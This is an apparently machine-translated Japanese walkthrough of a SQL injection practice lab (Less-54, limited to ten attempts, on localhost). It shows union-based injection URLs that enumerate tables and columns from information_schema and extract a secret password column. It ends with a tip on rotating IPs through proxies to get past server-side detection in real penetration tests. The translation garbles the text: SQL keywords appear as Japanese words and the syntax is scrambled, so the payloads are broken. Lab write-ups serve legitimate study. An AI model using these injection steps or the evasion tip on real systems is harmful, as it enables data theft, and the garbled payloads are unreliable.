このオフを開始してから、私たちは、ページ-4の課題を入力してください。これは主に、高度な学習のシリーズです、知識は、以前の回より深く使用することを学びました。私たちは、このオフにはまだメインキャラクターの注射であるが、唯一の10の試みを調べます。だから、しようとする時に考えることが必要です。どのように以下の数を減らすことができます。ここでは、テーブル名とパスワードは必須では交換後のすべての10回です。
このSQL文はオフです
$ SQL = "SELECT * FROM security.users ID = ' $ ID ' LIMIT 0,1" 。
データベース名はすでに課題に知られているので、我々は、テーブルの名前を知っている必要があります。
http://127.0.0.1/sql/Less-54/?id=-1組合1,2を選択し、TABLE_SCHEMA = INFORMATION_SCHEMA.TABLESからGROUP_CONCAT(TABLE_NAME) '課題' - +
表は、(あなたがしているテストがこれをすべきではないときが)、次のステップは、テーブル内のすべての列を見つけることですhcuhv04r8wと命名されました
http://127.0.0.1/sql/Less-54/?id=-1組合1,2を選択し、TABLE_SCHEMA = information_schema.columnsからGROUP_CONCAT(COLUMN_NAME) '課題' とtable_nameは= 'hcuhv04r8w' - +
私たちは、私たちが直接列の内容を見てあなたは、ここでパスワードsecret_PGN8列を知って、表示するためのデータのすべてを試すことができ、すべての列を得ました
http://127.0.0.1/sql/Less-54/?id=-1組合は、1,2を選択し、challenges.hcuhv04r8wからGROUP_CONCAT(secret_PGN8) - +
パスワードが提出されます。ページヒント:あなたはそれを釘付けおめでとう、成功。
実際には、実際の侵入テストの中で、私たちはどのようなサーバー側の検出限界に依存するなど、(プロキシを考えることができる)IPを交換するか、ブラウザを置き換えるために使用することができます。